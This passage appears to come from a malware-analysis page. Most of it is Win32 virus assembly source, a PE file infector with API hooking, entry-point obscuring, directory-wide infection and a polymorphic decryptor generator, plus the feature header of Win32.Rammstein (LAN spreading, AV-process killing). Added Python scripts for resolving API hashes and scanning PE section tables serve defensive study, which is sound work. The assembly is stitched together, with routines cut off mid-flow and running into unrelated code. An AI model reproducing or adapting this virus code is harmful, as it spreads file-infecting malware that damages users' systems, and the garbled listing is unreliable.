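if __name__ == "__main__":
    print(verify_pe_checksum(SAMPLE, SAMPLE_CHECKSUM_OFFSET))
```

On a real file, pass the mapped image and the offset of the CheckSum field; the loader only enforces the value for drivers and boot-time DLLs, so user-mode binaries with a stale or zero field are normal and the useful signal is a non-zero mismatch on a file that previously verified.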
process_memory struc
thandle dd 0 ;thread handle returned by the dropper
th_mempos dd 0 ;thread body memory position
process dd p_number dup (0,0) ;hProcess (Wait), ProcessID (Open)
apiz dd count-2 dup (0) ;all API functionz except the last two
active db p_number dup (0) ;active process (=function) ?
paramz dd 8 dup (0) ;process parameters
vbody db vsize dup (0) ;virus body (poly, valuez)
; filename dd 260 dup (0) ;name of file (opening, etc)
ci_size equ 2*16*(tbyte+tbyte) ;check_infected fpu buffer
; cinfected db ci_size dup(0)
; poly_vbody equ this byte
; ** This is a Tasm32 bug: it cannot assemble const->proc + dup
ends
align 4
file_end:
db 68 dup(0)
mem_end:
push 401000h
sub esp,vsize
jmp vstart
fgx:db "E:\X_WIN\ABCD.EXE",0
fg0:mov edx,offset fgx
sub eax,eax
push eax 80h 3 eax eax 0c0000000h edx
call CreateFileA
push 0 0
call fg1
db "Win32.Dream - welcome to my world...",0
fg1:call fg2
db "First generation sample",0
fg2:push 0
call MessageBoxA
call ExitProcess
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
vBegin label byte
inicio:
; call for the polymorphic decryptor
call crypt
; setup relocations
pop eax ; get stored virus EP
lea edx,inicio+ebp ; get current
sub edx,eax ; calc displacement
add dword ptr [esp+20h],edx ; fix hostRET
add dword ptr [imageBase+ebp],edx ; fix image base
getK32notEPO:
; use the value in the stack
mov esi,dword ptr [esp+24h]
call GetKernel32
jc tryFix
getAPIsNow:
; now get APIs using CRC32
mov edi,12345678h
kernel32 equ $-4
mov esi,edi
mov esi,dword ptr [esi+3ch]
add esi,edi
mov esi,dword ptr [esi+78h]
add esi,edi
add esi,1ch
lodsd
add eax,edi
mov dword ptr [address+ebp],eax
lodsd
add eax,edi
mov dword ptr [names+ebp],eax
lodsd
add eax,edi
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,edi
push eax edx edi
xor edi,edi
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edi edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je returnHost
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,edi
lea esi,inicio+ebp
mov edi,eax
mov ecx,vSize
rep movsb
lea esi,hostRET-1
lea edi,inicio+ebp
mov ecx,5
rep movsb
mov byte ptr [edi],0c3h
add eax,offset memCopy-offset inicio
push eax
ret
memCopy:
; get delta offset another time
call getDelta
lea edx,fileSize+ebp
cmp word ptr [edx+2],4
jne skipPay
cmp word ptr [edx+6],6
jne skipPay
lea edx,message+ebp
push edx
xor eax,eax
push eax
call dword ptr [_FatalAppExitA+ebp] ; bye bye ;)
skipPay:
; alloc a temporary buffer to generate the poly sample
; of the virus ready to infect
push 00000004h
push 00001000h OR 00002000h
push (vSize+1000h)
push 0h
call dword ptr [_VirtualAlloc+ebp]
or eax,eax
jz returnHost
returnHost:
popad
ret
;
; Returns Delta offset into ebp.
;
getDelta:
call delta
delta:
pop ebp
sub ebp,offset delta
ret
;
; General hook. This routine is for all the hooks.
; We have in esi the path to analyze, the address of the
; original API in the stack (plus a pushad) and the delta
; offset in ebp. I use a semaphore 'cause the virus doesn't support
; multithreading. If a hooked API is called by another thread while
; the virus is in the infection process, it could be fatal. I'm not
; 100% sure this is necessary but... ;)
;
generalHook:
pushfd
cld
; set sem to working
mov byte ptr [semHook+ebp],1
call stringUp
jc hookInfectionFail
push edi
lea edx,stringBuffer+ebp
push edx
call dword ptr [_GetFileAttributesA+ebp]
pop edi
inc eax
jz hookInfectionFail
dec eax
lea edx,stringBuffer+ebp
cmp word ptr [edx+1],'\:' ; absolute path?
je getPath
pathOk:
mov dword ptr [edi],0 ; now we have a path
call infectDir
jmp hookInfectionFail
hookInfectionFail:
; set sem to free
mov byte ptr [semHook+ebp],0
popfd
popad
ret
;
; Nice macro ;)
;
@hook macro ApiAddress
push eax
pushad
call getDelta
mov eax,dword ptr [ApiAddress+ebp]
mov dword ptr [esp+20h],eax
mov esi,dword ptr [esp+28h]
GetKernel32Loop:
dec esi
cmp word ptr [esi],'ZM' ; 'poda' -> this makes algo
jne GetKernel32Loop ; faster
mov dx,word ptr [esi+3ch]
test dx,0f800h
jnz GetKernel32Loop
cmp esi,dword ptr [esi+edx+34h]
jne GetKernel32Loop
mov dword ptr [kernel32+ebp],esi
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
clc
ret
GetKernel32Exception:
xor edi,edi
mov eax,dword ptr fs:[edi]
mov esp,dword ptr [eax]
xor edi,edi
pop dword ptr fs:[edi]
pop eax
popad
stc
ret
;
; This routine makes CRC32.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;
; Updates the virus sample ready to infect in our memory buffer.
;
updateVSample:
lea esi,vBegin+ebp
mov edi,dword ptr [memHnd+ebp]
mov ecx,vSize
rep movsb
mov ecx,crptSecondEND-crptSecondINI
mov esi,crptSecondINI-vBegin
add esi,dword ptr [memHnd+ebp]
secondEnLayerLoop:
not byte ptr [esi]
inc esi
loop secondEnLayerLoop
push esi
push esi
call dword ptr [_GetFileAttributesA+ebp]
pop esi
inc eax
jz infectionError
dec eax
push esi
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz infectionError
xor eax,eax
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz infectionErrorAttrib
dec eax
push 0h
push eax
call dword ptr [_GetFileSize+ebp]
inc eax
jz infectionErrorClose
dec eax
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_GetFileTime+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
mov edi,eax
cmp word ptr [edi],'ZM'
jne infectionErrorCloseUnmap
mov edx,edi
mov esi,edi
mov eax,18h
add ax,word ptr [edi+14h]
add edi,eax
mov dword ptr [fstSec+ebp],edi
push edx
mov cx,word ptr [esi+06h]
mov ax,28h
dec cx
mul cx
add edi,eax
pop edx
jmp yeahEPO
notEPO:
call lightEPO ; try light EPO
jc notNotEPO
notNotEPO:
; if I can't find a nice call to patch and I can't add
; a jump at the end of the code section I use the non-EPO
; infection. This could be a problem for the wild time
; of the virus 'cause heuristics can fake it easily
; but we want to be infectious ;)
push edi ; store new ep and get old
mov edi,dword ptr [myRVA+ebp] ; set edi=new ep
mov dword ptr [EPOAddr+ebp],0 ; getk32 changes if epo!
xor eax,eax
push eax
push dword ptr [pad+ebp]
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push dword ptr [pad+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
infectionErrorCloseUnmap:
push dword ptr [mapMem+ebp]
call dword ptr [_UnmapViewOfFile+ebp]
infectionErrorCloseMap:
push dword ptr [fhmap+ebp]
call dword ptr [_CloseHandle+ebp]
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_SetFileTime+ebp]
infectionErrorClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
infectionErrorAttrib:
push dword ptr [fileAttrib+ebp]
push dword ptr [fNameAddr+ebp]
call dword ptr [_SetFileAttributesA+ebp]
infectionError:
popad
ret
;
; This is my 'search EPO' routine. It searches for a call in the code section
; that points to:
;
; push ebp
; mov ebp,esp
;
; This is the way high level languages get the arguments used to call
; a procedure. If this code is found I assume the call found is correct
; and I patch it to jump into the virus.
;
; I tested selecting the call randomly, but this is not needed. There
; could be calls that point to the desired code and calls that are not
; useful for the virus. AV cannot know which call is patched until
; it finds it. Moreover, using the 1st call found I'm more sure that the virus
; will be executed! And this is good enough to fuck most cool heuristics.
;
searchEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
sectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz searchEPOFail ; we can corrupt it!
push esi
sub edi,dword ptr [esi+0ch] ; get raw address
add edi,dword ptr [esi+14h]
mov ecx,dword ptr [esi+10h]
cmp ecx,edi
jna searchEPOFail
sub ecx,edi
add edi,dword ptr [mapMem+ebp]
mov ebx,edi
add ebx,ecx
sub ebx,10h ; high secure fence
callLoop: ; loop that searches
cmp byte ptr [edi],0e8h ; for the call
jne continueCallLoop
mov edx,edi
add edx,dword ptr [edi+1]
add edx,5
cmp ebx,edx
jb continueCallLoop
cmp edx,dword ptr [mapMem+ebp]
jb continueCallLoop
mov esi,edx
mov dx,word ptr [esi]
cmp dx,08b55h
jne continueCallLoop
mov dx,word ptr [esi+1]
cmp dx,0ec8bh
jne continueCallLoop
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
pop esi
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
jmp searchEPOOut
continueCallLoop:
inc edi
loop callLoop
searchEPOFail:
pop esi
stc
searchEPOOut:
popad
ret
;
; This makes a light EPO. It looks for space in the code section to
; put there a jump to the virus code. The header is patched, but this
; patch is less noticeable. This EPO requires the physical size of the
; section to be bigger than the virtual size + 5 (the size of the jump).
;
lightEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
lightSectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz lightEPOFail ; we can corrupt it!
mov eax,dword ptr [esi+08h] ; virtual size
add eax,5 ; plus the code we add
cmp eax,dword ptr [esi+10h] ; bigger than phys size?
ja lightEPOFail
mov edi,dword ptr [mapMem+ebp] ; get raw address
add edi,dword ptr [esi+08h]
add edi,dword ptr [esi+14h]
mov dword ptr [esi+08h],eax ; increase 5 bytes
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
lightEPOOut:
popad
ret
;
; Infects PE files in current directory.
;
infectDir:
pushad
lea esi,find_data+ebp
push esi
lea esi,fndMask+ebp
push esi
call dword ptr [_FindFirstFileA+ebp]
inc eax
jz notFound
dec eax
findNext:
lea esi,find_data.cFileName+ebp
call stringUp
lea esi,stringBuffer+ebp
push edi ; test that the string is
sub edi,esi ; long enough
cmp edi,5
pop edi
jna skipThisFile
cmp dword ptr [edi-4],'EXE.'
je validFileExt
cmp dword ptr [edi-4],'RCS.'
jne skipThisFile
validFileExt:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
cmp eax,4000h
jb skipThisFile ; at least 4000h bytes?
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; remainder is zero?
jz skipThisFile
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
notFound:
popad
ret
;
; Virus data ---------------------------------------------------------------
;
HOOKTABLEBEGIN label byte
dd offset _CreateFileA
dd offset Hook0
dd offset _MoveFileA
dd offset Hook1
dd offset _CopyFileA
dd offset Hook2
dd offset _CreateProcessA
dd offset Hook3
dd offset _SetFileAttributesA
dd offset Hook4
dd offset _GetFileAttributesA
dd offset Hook5
dd offset _SearchPathA
dd offset Hook6
HOOKTABLEEND label byte
EPOAddr dd 0
; little tribute
message db 'ASIMOV Jan.2.1920 - Apr.6.1992',0
CrcCreatFileMappingA dd 096b2d96ch
db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
db 13
_VirtualAlloc dd 0
CrcGetTickCount dd 0613fd7bah
db 13
_GetTickCount dd 0
CrcGetFileTime dd 04434e8feh
db 12
_GetFileTime dd 0
CrcSetFileTime dd 04b2a3e7dh
db 12
_SetFileTime dd 0
CrcSetFileAttributesA dd 03c19e536h
db 19
_SetFileAttributesA dd 0
CrcGetFileAttributesA dd 0c633d3deh
db 19
_GetFileAttributesA dd 0
CrcGetFileSize dd 0ef7d811bh
db 12
_GetFileSize dd 0
CrcGetSystemTime dd 075b7ebe8h
db 14
_GetSystemTime dd 0
CrcFatalAppExitA dd 0253ab1b9h
db 14
_FatalAppExitA dd 0
CrcMoveFileA dd 02308923fh
db 10
_MoveFileA dd 0
CrcCopyFileA dd 05bd05db1h
db 10
_CopyFileA dd 0
CrcCreateProcessA dd 0267e0b05h
db 15
_CreateProcessA dd 0
CrcSearchPathA dd 0f4d9d033h
db 12
_SearchPathA dd 0
CrcGetCurrentDirectoryA dd 0ebc6c18bh
db 21
_GetCurrentDirectoryA dd 0
CrcSetCurrentDirectoryA dd 0b2dbd7dch
db 21
_SetCurrentDirectoryA dd 0
CrcGetWindowsDirectoryA dd 0fe248274h
db 21
_GetWindowsDirectoryA dd 0
ENDAPI label byte
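The CRC32 routine above (polynomial split as 08320h/0EDB8h, start value 0FFFFFFFFh, final NOT) is the standard reflected CRC-32, and the Crc... table just listed stores one such hash per imported API so that no API names appear in the body. For an analyst the mapping is recovered by brute lookup: hash every candidate export name with the same CRC and compare against the constants found in the sample. The block below is an added Python example, not code from the page or its authors. It reimplements the bit-serial CRC the way the routine does it, cross-checks it against `zlib.crc32`, and is parametrised so the same loop also reproduces the differently seeded `crc32` macro in RAMM.ASM later on this page. The candidate name list is constructed; the hash values in `SAMPLE_HASHES` are copied from the table above, and which of them resolve is something the script reports rather than something assumed here.

```python
import zlib


def crc32_reflected(data: bytes, poly: int = 0xEDB88320,
                    init: int = 0xFFFFFFFF, xorout: int = 0xFFFFFFFF) -> int:
    """Bit-serial reflected CRC-32 in the shape of the CRC32 routine above and
    of the `crc32` macro in RAMM.ASM: each byte is XORed into the low byte of
    the register, the register shifts right one byte, and eight
    shift-and-conditional-XOR steps fold the polynomial into that byte.
    Defaults are the standard (zlib) parameters; the RAMM.ASM macro is the
    same loop with poly=0xC1A7F39A, init=0x9C3B248E and no final XOR.
    """
    crc = init
    for byte in data:
        ctrl = (crc ^ byte) & 0xFF
        crc >>= 8
        for _ in range(8):
            ctrl = (ctrl >> 1) ^ (poly if ctrl & 1 else 0)
        crc ^= ctrl
    return (crc ^ xorout) & 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Cross-check the hand-written loop against the library implementation."""
    return crc32_reflected(data) == (zlib.crc32(data) & 0xFFFFFFFF)


# Export names to try (constructed list; in practice feed the whole export
# table of the DLL the sample resolves its imports from).
CANDIDATE_NAMES = [
    "CloseHandle", "CreateFileA", "CreateFileMappingA", "MapViewOfFile",
    "UnmapViewOfFile", "FindFirstFileA", "FindNextFileA", "FindClose",
    "VirtualAlloc", "GetTickCount", "GetFileTime", "SetFileTime",
    "SetFileAttributesA", "GetFileAttributesA", "GetFileSize",
    "GetSystemTime", "FatalAppExitA", "MoveFileA", "CopyFileA",
    "CreateProcessA", "SearchPathA", "GetCurrentDirectoryA",
    "SetCurrentDirectoryA", "GetWindowsDirectoryA", "GetProcAddress",
]


def build_hash_table(names, **crc_params):
    """Inverted table hash -> name for the given CRC parameters."""
    return {crc32_reflected(n.encode("ascii"), **crc_params): n for n in names}


def resolve_hashes(hashes, names, **crc_params):
    """Map each hash to the candidate name that produces it, or None."""
    table = build_hash_table(names, **crc_params)
    return {h: table.get(h) for h in hashes}


# Constants copied from the Crc... table above (CloseHandle, CreateFileMappingA,
# UnmapViewOfFile, VirtualAlloc, FatalAppExitA entries).  Whether each one
# resolves against CANDIDATE_NAMES is reported by running the script.
SAMPLE_HASHES = [0x68624A9D, 0x96B2D96C, 0x94524B42, 0x4402890E, 0x253AB1B9]

if __name__ == "__main__":
    for h, name in resolve_hashes(SAMPLE_HASHES, CANDIDATE_NAMES).items():
        print(f"{h:08x} -> {name or '<unresolved>'}")
```

Because the loop takes the polynomial and seed as parameters, a hash table that resolves nothing with the defaults can be retried with the sample's own constants (for RAMM.ASM, `poly=0xC1A7F39A, init=0x9C3B248E, xorout=0`) without rewriting the resolver.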
;
; Polymorphic Engine (V2LPE - Very^2 Lame Polymorphic Engine)
;
; This is a simple polymorphic engine. It uses some pieces of code from
; AOCPE. Very, very lame :( But it does its work as a poly engine. Maybe
; its size is the only point in its favour.
;
; EAX: CrptKey
; ECX: CodeSize (code to decrypt, already prepared)
; EDI: Destination address
;
; returns EAX: size of generated proc
;
GenDCrpt:
pushad ; setup regs status
xor eax,eax
lea edi,RegStatus+ebp
mov ecx,8
rep stosb
popad
mov byte ptr [RegStatus+ebp+_EBP],1
mov byte ptr [RegStatus+ebp+_ESP],1
mov dword ptr [CrptKey+ebp],eax
mov dword ptr [CodeSize+ebp],ecx
push edi
xor eax,eax
call GetReg
mov byte ptr [KeyReg+ebp],al
call AddShit
mov cl,_EBP
call AddPushREG
call AddShit
mov ax,0ec8bh
stosw
call AddShit
mov edx,04h
mov cl,_EBP
call AddMovREGMEMEBP
call AddShit
call AddShit
call AddShit
call GetReg
mov byte ptr [LoopReg+ebp],al
mov cl,al
call AddPushREG
call AddShit
call AddShit
push edi
call AddShit
mov cl,_EBP
mov edx,04h
call AddAddREGINM
call AddShit
pop ebx
mov eax,edi
sub eax,ebx
push eax
mov al,75h
stosb
pop eax
mov ah,0feh
xchg al,ah
sub al,ah
stosb
call AddShit
call AddShit
call AddShit
mov cl,_EBP
call AddPopREG
call AddShit
mov al,0c3h
stosb
pop esi
sub edi,esi
mov eax,edi
ret
;
; Poly engine data
;
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
RegStatus db 8 dup(0)
KeyReg db 0
LoopReg db 0
CrptKey dd 0
CodeSize dd 0
Rnd db ?
;
; returns AL: selected register
;
GetReg:
xor eax,eax
mov al,byte ptr [CrptKey+ebp]
GetReg1:
and al,7
lea ecx,RegStatus+ebp
add ecx,eax
mov dl,byte ptr [ecx]
or dl,dl
jz GetReg0
inc al
jmp GetReg1
GetReg0:
mov byte ptr [ecx],1
ret
;
; AL: selected register to free
;
FreeReg:
and eax,7
lea ecx,RegStatus+ebp
add ecx,eax
mov byte ptr [ecx],0
ret
;
; Instruction generators
;
; EDI: Destination code
; ECX: Reg (if applicable)
; EDX: Inm (if applicable)
;
AddPushREG:
mov al,050h
add al,cl
stosb
ret
AddPopREG:
mov al,058h
add al,cl
stosb
ret
AddMovREGINM:
mov al,0b8h
add al,cl
stosb
mov eax,edx
stosd
ret
AddMovREGMEMEBP:
mov al,08bh
stosb
mov al,08h
mul cl
add al,85h
stosb
mov eax,edx
stosd
ret
AddXorMEMEBPREG:
mov al,031h
stosb
mov al,08h
mul cl
add al,45h
stosb
xor al,al
stosb
ret
AddAddREGINM:
or cl,cl
jnz AddAddREGINM0
mov al,05h
stosb
jmp AddAddREGINM1
AddAddREGINM0:
mov al,081h
stosb
mov al,0c0h
add al,cl
stosb
AddAddREGINM1:
mov eax,edx
stosd
ret
AddSubREGINM:
or cl,cl
jnz AddSubREGINM0
mov al,2dh
stosb
jmp AddSubREGINM1
AddSubREGINM0:
mov al,081h
stosb
mov al,0e8h
add al,cl
stosb
AddSubREGINM1:
mov eax,edx
stosd
ret
;
; Yet another lame shit generator by Bumblebee ;)
;
AddShit:
mov eax,dword ptr [CrptKey+ebp]
add byte ptr [Rnd+ebp],al
and al,1
jz AddShit2
xor eax,eax
mov al,byte ptr [Rnd+ebp]
lea edx,shit0+ebp
and al,7
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
lea edx,shit1+ebp
mov al,byte ptr [Rnd+ebp]
and al,3
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
stosw
ret
AddShit2:
xor eax,eax
mov al,byte ptr [Rnd+ebp]
lea edx,shit0+ebp
and al,7
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
lea edx,shit0+ebp
add edx,2
mov al,byte ptr [Rnd+ebp]
and al,3
mov cl,2
mul cl
add edx,eax
mov ax,word ptr [edx]
stosw
ret
; some do-nothing opcodes
shit0: dw 9090h,0db87h,0c987h,0d287h,4840h,434bh,4941h,4a42h
shit1: dw 0d0f7h,0d3f7h,0d1f7h,0d2f7h
; This is a fake decryptor for the 1st generation. Allows the virus to
; skip the second layer decryptor.
crypt:
pop edx
lea edx,crptSecondINI
push edx
ret
;
; Temp data. Not stored into the file, only 1st generation.
;
BUFFERBEGIN label byte
stringBuffer db STRINGTOP dup(0)
tmpPath db STRINGTOP dup(0)
address dd 0
names dd 0
ordinals dd 0
nexports dd 0
expcount dd 0
memHnd dd 0
fHnd dd 0
fhmap dd 0
mapMem dd 0
fileSize dd 0
fileAttrib dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
pad dd 0
fNameAddr dd 0
gensize dd 0
virtsize dd 0
myRVA dd 0
fstSec dd 0
find_data WIN32_FIND_DATA <0>
findHnd dd 0
semHook db 0
EPORva dd 0
BUFFEREND label byte
BUFFERSIZE equ BUFFEREND-BUFFERBEGIN
;
; For 1st generation only.
;
fakeHost:
push 0h
call ExitProcess
Ends
End inicio
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMM.ASM]ÄÄÄ
comment $
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ÛÛß ßÛß ßÛß ßÛÛ
ÛÛ Û Û Û Û Û ÛÛ
ÛÛÛßßß ÜÛÜ Û ÛÛ
ÛÛ ßßßßÛßßßß Û Û ÛÛ
ÛÛ Û ÜÛ Û ÛÛ
ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
v4.0
= Final Release =
===================================================================
DISCLAIMER
====================================================================
History:
09 Sep 2000 - Today I made a small improvement. When the dropper roams
the net onto another computer it remains in the windows
dir and it represents a weak point which might be noticed
by an av. So, now, the virus will smartly remove either
the dropper or the entry in the win.ini file if one of
them is missing. If both are there, they are left alone
because they will remove each other. Added Pstores.exe to
the black list. Thanks to Evul for pointing out to me that
it is a rather peculiar file and cannot be safely
infected.
22 Jul 2000 - The virus has moved up to version 4.0. Today I added
the network infector. It comes in a separate thread.
For the moment it looks like everything works fine. Will
add a timer to it so that it does not hang in huge
networks... Virus is above 13k now... Waiting for the
LZ!
22 May 2000 - Added EPO on files that have the viral code outside the
code section. Basically from now on the entry point stays
only into the code section. The epo is not actually epo,
because as I started to code it I decided to make it very
complicated so I will include the complicated part in the
next release. It will be the so called LJILE32 <Lord
Julus' Instruction Length Engine 32>. This engine will
allow me to have an exact location of the opcode for each
instruction so we will be able to look up any call, jump
or conditional jump to place our code call there. So for
this version only a jump at the original eip.
21 May 2000 - Fixed a bug in the api hooker... I forgot that some import
sections have a null pointer to names. Also added the
infection by last section increase for files that cannot
be infected otherwise. All files should be touched now.
Also I fixed the problem with the payload window not
closing after the process closed. I solved half of it
as some files like wordpad.exe still have this problem.
====================================================================
Virus Name ........... Win32.Rammstein
Virus Version ........ 4.0
Virus Size ........... 14002 (debug), 15176 (release)
Virus Author ......... Lord Julus / 29A
Release Date ......... 30 Nov 2000
Virus type ........... PE infector
Target OS ............ Win95, Win98, WinNT, Win2000
Target Files ......... many PE file types:
EXE COM ACM CPL HDI OCX PCI
QTC SCR X32 CNV FMT OCM OLB WPC
Append Method ........ The virus will check whether there is enough room
for it inside the code section. If there is not
enough room the virus will be placed at end. If
there is it will be inserted inside the code
section at a random offset while the original
code will be saved at end. The placing at the end
has also two variants. If the last section is
Resources or Relocations the virus will insert a
new section before the last section and place the
data there, also rearranging the last section's
RVAs. If the last section is another section a
new section will be placed at end. The name of
the new section is a common section name which is
chosen based on the existing names so that it
does not repeat. If the virus is placed at the
end just a small EPO code is used so that the eip
stays inside the code section.
A special situation occurs if there is not enough
space to add a new section header, for example
when the code section starts at RVA 200 (end of
headers). In this situation the virus will
increase the last section in order to append.
Infect Methods ....... -Direct file attacks: the virus will attack
specific files in the windows directory, files
which are most used by people
-Directory scan: all files in the current
directory will be infected, as well as 3 files in
the system directory and 3 in the windows
directory
-Api hooking (per-process residency): the virus
hooks a few api calls and infects files as the
victim uses the apis
-Intranet spreading: the virus spreads into the
LAN using only windows apis
Features ............. Multiple threads: the virus launches a main
thread. While this thread executes, in the same
time, the original thread returns to host, so no
slowing down appears. The main viral thread
launches 6 other threads and monitors their
execution. If one of the threads is not able to
finish the system is hung because it means
somebody tried to patch some of the thread code.
Heavy anti-debugging: I tried to use almost all
the anti-debug and anti-emulation stuff that I
know
FPU: uses fpu instructions
Crc32 search: uses crc32 to avoid waste of space
Memory roaming: allocates virtual memory and
jumps in it
Interlaced code: this means that some threads
share the same piece of code and the virus is
careful to let only one in the same time
otherwise we get some of the variables destroyed.
Pretty hard to be emulated by AVs.
Also features semaphores, timers
Marks infection using the Pythagorean numbers.
SEH: the virus creates 9 SEH handlers, for each
thread and for the main thread.
(*) Polymorphic .......... Yes (2 engines: Modularis, LJFPE32)
(*) Metamorphic .......... Yes (mild custom metamorphic engine)
Encrypted ............ Yes
Safety ............... Yes (avoids infecting many files)
Kill AV Processes .... Yes
Payload .............. On 14th every even month the infected process
will launch a thread that will display random
windows with some of Rammstein's lyrics.
Pretty annoying... Probably this is the first
virus that actually creates real windows and
processes their messages. The windows shut down
as the victim process closes.
Debug notes: please note that this source code features many ways of
debugging. You may turn on and off most of the virus's features by
turning some variables to TRUE or FALSE.
====================================================================
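The append methods just described (a new section before or after the last one, the last section grown when no header slot is free, a small jump left in the code section), the W+X characteristics that infect_exe ORs into its section earlier on this page, and the raw-size slack that lightEPO needs all leave traces in the section table that a scanner can check without executing anything. The block below is an added Python example, not code from the page or from any of the viruses on it. It parses the section headers of a PE32 image, raises the header-level findings a defender would look for, and exercises them on two constructed header-only images; the slack threshold (SizeOfRawData exceeding VirtualSize by at least FileAlignment) and the "entry point in the last section" rule are heuristics chosen for this example, not rules taken from the page.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(pe: bytes):
    """Return (entry_rva, file_alignment, sections) from a PE32 buffer.
    Offsets are the ones the infectors above patch: NumberOfSections at
    FileHeader+2, AddressOfEntryPoint at OptionalHeader+16, FileAlignment at
    OptionalHeader+36, 40-byte section headers right after the optional header."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    (nsections,) = struct.unpack_from("<H", pe, fh + 2)
    (opt_size,) = struct.unpack_from("<H", pe, fh + 16)
    opt = fh + 20
    (entry,) = struct.unpack_from("<I", pe, opt + 16)
    (file_align,) = struct.unpack_from("<I", pe, opt + 36)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
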